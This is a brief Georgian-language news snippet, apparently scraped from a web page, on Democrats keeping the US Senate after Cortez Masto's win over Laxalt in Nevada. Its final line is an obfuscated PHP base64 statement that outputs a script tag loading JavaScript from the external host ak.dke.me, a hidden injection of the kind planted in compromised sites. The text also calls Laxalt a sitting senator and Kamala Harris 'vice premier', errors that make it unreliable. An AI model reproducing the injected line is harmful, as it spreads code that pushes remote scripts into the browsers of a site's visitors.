celsiusi
ავერსი საქკაბელი
ნევადაში გამარჯვების შემდეგ, დემოკრატები აშშ-ს სენატზე უმრავლესობას ინარჩუნებენ.
 
ნევადაში დემოკრატმა სენატორმა, კეტრინ კორტეს მასტომ  რესპუბლიკელი სენატორი და ყოფილი პრეზიდენტის ტრამპის მიერ მხარდაჭერილი კანდიდატი, ადამ ლაქსლატი დაამარცხა.
 
სენატში დემოკრატებს 50 ადგილი აქვთ რესპუბლიკელებს კი, 49. ჯორჯიას შტატში ხელახალი არჩევნები დეკემბერშია ჩანიშნული, თუმცა ვიცე პრემიერის კამალა ჰარისის დამატებითი ხმით, სენატში უმრავლესობას მაინც დემოკრატები შეინარჩუნებენ.
 
რაც შეეხება წარმომადგენელთა პალატას, ამ შემთხვევაში ჯერჯერობით უპირატესობა რესპუბლიკელებს აქვთ, თუმცა ხმების დათვლა დასრულებული არაა. საბოლოო შედეგები რამდენიმე დღეში გახდება ცნობილი.  
292
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");